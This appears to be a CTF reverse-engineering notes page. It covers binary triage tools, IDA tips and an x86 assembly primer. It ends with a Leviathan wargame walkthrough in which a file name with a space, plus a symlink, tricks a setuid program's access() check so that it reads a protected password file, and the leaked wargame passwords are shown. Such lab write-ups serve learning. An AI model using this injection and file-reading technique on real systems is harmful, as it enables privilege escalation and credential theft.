Reverse Engineering

bvi : visual editor for binary files

This post lists the learnings from the CTF while doing Reverse Engineering.

If we are provided with a binary to reverse engineer, for example asking for password.

file: The first step is to run file command on the binary which would tell us whether it is 32/64 bit or statically/dynamically linked etc.

bitvijays@kali:~/Desktop/CTF/31C3$ file cfy
cfy: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x9bc623f046535fba50a2124909fb871e5daf198e, not stripped

The second step could be running strings or “hexdump -C” on it, specially in the case of very simple re challenges like asking for password and stored in an array.

bitvijays@kali:~$ strings check
/lib/ld-linux.so.2
D$,1
D$%secrf
D$)et
D$ love
T$,e3
[^_]
password:
/bin/sh
Wrong password, Good Bye ...
;*2$"

hexdump -C check | more
00000540  31 c0 c7 44 24 18 73 65  78 00 c7 44 24 25 73 65  |1..D$.sec..D$%se|
00000550  63 72 66 c7 44 24 29 65  74 c6 44 24 2b 00 c7 44  |crf.D$)et.D$+..D|
00000560  24 1c 67 6f 64 00 c7 44  24 20 6c 6f 76 65 c6 44  |$.god..D$ love.D|

The next step could be running strace or ltrace on the binary. strace: trace system calls and signals ltrace: A library call tracer
GDB Commands:

info file: Tell us about the entry points:
info functions: Tell us about the functions in the binary.

ObjDump

```

objdump -Dj .text

objdump” disassembles all (-D) of the first file given by #invoker, but only prints out the “.text” section (-j .text) (only section #that matters in almost any compiled program

```

IDA

Search strings in IDA: Enter the “strings window” by either press shift+F12 or go to View > Open Subviews > Strings in the toolbar.
Want to convert Hex to ASCII?

mov     [ebp+var_28], 46h
mov     [ebp+var_27], 4Ch
mov     [ebp+var_26], 41h
Select the hex and press the keyboard key “R”; If you are selecting multiple values together, a pop-up “Convert to Char en masse”, select “Operand value range”, Lower value “0x00” and Upper Value “0xFF” and convert.

Appendix-I Assembly Basics

Assembly Program

An assembly program can be divided into three sections

The data section,
The bss section, and
The text section

Used for declaring initialized data or constants.
Doesn’t change at runtime
Can declare various constant values, filenames or buffer sizes.

Syntax

section.data

Used for declaring variables

Syntax

section.bss

Used for keeping the actual code.
Must begin with the declaration global _start which tells the kernel where the program execution begins.

Syntax

section.text
   global _start
_start:

Assembly language comment begins with a semicolon (;). It may contain any printable character including blank. It can appear on a line by itself, like −

; This program displays a message on screen

or, on the same line along with an instruction, like

add eax, ebx     ; adds ebx to eax

Assembly language programs consist of three types of statements

Executable instructions or instructions tells the processor what to do. Each instruction consists of an operation code (opcode). Each executable instruction generates one machine language instruction.
Assembler directives or pseudo-ops tell the assembler about the various aspects of the assembly process. These are non-executable and do not generate machine language instructions.
Macros are basically a text substitution mechanism.

Syntax

Entered one statement per line with the following format

[label]   mnemonic   [operands]   [;comment]

The fields in the square brackets are optional. A basic instruction has two parts,

the first one is the name of the instruction (or the mnemonic), which is to be executed, and
the second are the operands or the parameters of the command.

A good guide to follow is x86 Assembly Guide <`http://www.cs.virginia.edu/~evans/cs216/guides/x86.html>_

Registers

Memory and Addressing Modes

Data declarations should be preceded by the .DATA directive. Following this directive, the directives DB, DW, and DD can be used to declare one, two, and four byte data locations, respectively. Declared locations can be labeled with names for later reference — this is similar to declaring variables by name, but abides by some lower level rules.

Example declarations:

.DATA
varDB 64                 ; Declare a byte, referred to as location var, containing the value 64.
var2DB ?                 ; Declare an uninitialized byte, referred to as location var2.
DB 10                    ; Declare a byte with no label, containing the value 10. Its location is var2 + 1.
XDW ?                    ; Declare a 2-byte uninitialized value, referred to as location X.
YDD 30000                ; Declare a 4-byte value, referred to as location Y, initialized to 30000.

An array can be declared by just listing the values, as in the first example below. Two other common methods used for declaring arrays of data are the DUP directive and the use of string literals. The DUP directive tells the assembler to duplicate an expression a given number of times. For example, 4 DUP(2) is equivalent to 2, 2, 2, 2.

Examples:

Z          DD 1, 2, 3    ; Declare three 4-byte values, initialized to 1, 2, and 3. The value of location Z + 8 will be 3.
bytes      DB 10 DUP(?)  ; Declare 10 uninitialized bytes starting at location bytes.
arr        DD 100 DUP(0) ; Declare 100 4-byte words starting at location arr, all initialized to 0
str        DB 'hello',0  ; Declare 6 bytes starting at the address str, initialized to the ASCII character values for hello and the null (0) byte.

Mov instruction moves data between registers and memory. This instruction has two operands: the first is the destination and the second specifies the source.

mov eax, [ebx]           ; Move the 4 bytes in memory at the address contained in EBX into EAX
mov [var], ebx           ; Move the contents of EBX into the 4 bytes at memory address var. (Note, var is a 32-bit constant).
mov eax, [esi-4]         ; Move 4 bytes at memory address ESI + (-4) into EAX
mov [esi+eax], cl        ; Move the contents of CL into the byte at address ESI+EAX
mov edx, [esi+4*ebx]     ; Move the 4 bytes of data at address ESI+4*EBX into EDX

The size directives BYTE PTR, WORD PTR, and DWORD PTR serve this purpose, indicating sizes of 1, 2, and 4 bytes respectively.

For example:

mov BYTE  PTR [ebx], 2   ; Move 2 into the single byte at the address stored in EBX.
mov WORD  PTR [ebx], 2   ; Move the 16-bit integer representation of 2 into the 2 bytes starting at the address in EBX.
mov DWORD PTR [ebx], 2   ; Move the 32-bit integer representation of 2 into the 4 bytes starting at the address in EBX.

The lea instruction places the address specified by its second operand into the register specified by its first operand. Note, the contents of the memory location are not loaded, only the effective address is computed and placed into the register. This is useful for obtaining a pointer into a memory region.

Syntax

lea <reg32>,<mem>

Examples

lea edi, [ebx+4*esi]     ; the quantity EBX+4*ESI is placed in EDI.
lea eax, [var]           ; the value in var is placed in EAX.
lea eax, [val]           ; the value val is placed in EAX.

Jump Statements

Signedness doesn’t matter.

Instr	Description	Flags
JO	Jump if overflow	OF = 1
JNO	Jump if not overflow	OF = 0
JS	Jump if sign	SF = 1
JNS	Jump if not sign	SF = 0
JE/ JZ	Jump if equal Jump if zero	ZF = 1
JNE/ JNZ	Jump if not equal Jump if not zero	ZF = 0
JP/ JPE	Jump if parity Jump if parity even	PF = 1
JNP/ JPO	Jump if no parity Jump if parity odd	PF = 0
JCXZ/ JECXZ	Jump if CX is zero Jump if ECX is zero	CX = 0 ECX = 0

Unsigned Ones

Instr	Description	signed-ness	Flags
JB/ JNAE/ JC	Jump if below Jump if not above or equal Jump if carry	unsigned	CF = 1
JNB/ JAE/ JNC	Jump if not below Jump if above or equal Jump if not carry	unsigned	CF = 0
JBE/ JNA	Jump if below or equal Jump if not above	unsigned	CF = 1 or ZF = 1
JA/ JNBE	Jump if above Jump if not below or equal	unsigned	CF = 0 and ZF = 0

Signed Ones

Instr	Description	signed-ness	Flags
JL/ JNGE	Jump if less Jump if not greater or equal	signed	SF <> OF
JGE/ JNL	Jump if greater or equal Jump if not less	signed	SF = OF
JLE/ JNG	Jump if less or equal Jump if not greater	signed	ZF = 1 or SF <> OF
JG/ JNLE	Jump if greater Jump if not less or equal	signed	ZF = 0 and SF = OF

Examples

Consider a binary which is setuid and used to read files.

leviathan2@melinda:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename

leviathan2@melinda:~$ ls -la
-r-sr-x---   1 leviathan3 leviathan2 7498 Nov 14 10:32 printfile

We need to read

leviathan2@melinda:~$ ls -l /etc/leviathan_pass/leviathan3
-r-------- 1 leviathan3 leviathan3 11 Nov 14 10:32 /etc/leviathan_pass/leviathan3

Let’s see the ltrace of the binary while accessing a file which we are allowed to read

leviathan2@melinda:~$ ltrace ./printfile /etc/leviathan_pass/leviathan2
__libc_start_main(0x804852d, 2, 0xffffd774, 0x8048600 <unfinished ...>
access("/etc/leviathan_pass/leviathan2", 4)                                                                            = 0
snprintf("/bin/cat /etc/leviathan_pass/lev"..., 511, "/bin/cat %s", "/etc/leviathan_pass/leviathan2")                  = 39
system("/bin/cat /etc/leviathan_pass/lev"...ougahZi8Ta
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                 = 0
+++ exited (status 0) +++

So it’s a matter of tricking access(), if the call to access() succeeds then it calls system(“cat file”), so if pass the argument printfile / etc/issue, then it works. We can get around it by using a space in our file name. Eg: touch foobar. then we create a symlink to the password file and call it foo. ln -s /etc/leviathanpass/leviathan3 foo

leviathan2@melinda:~$ mkdir /tmp/levi
leviathan2@melinda:~$ cd /tmp/levi
leviathan2@melinda:/tmp/levi$ ls
leviathan2@melinda:/tmp/levi$ ln -s /etc/leviathan_pass/leviathan3 ./foo
leviathan2@melinda:/tmp/levi$ touch foo\ bar
leviathan2@melinda:/tmp/levi$ ~/printfile foo\ bar
Ahdiemoo1j
/bin/cat: bar: No such file or directory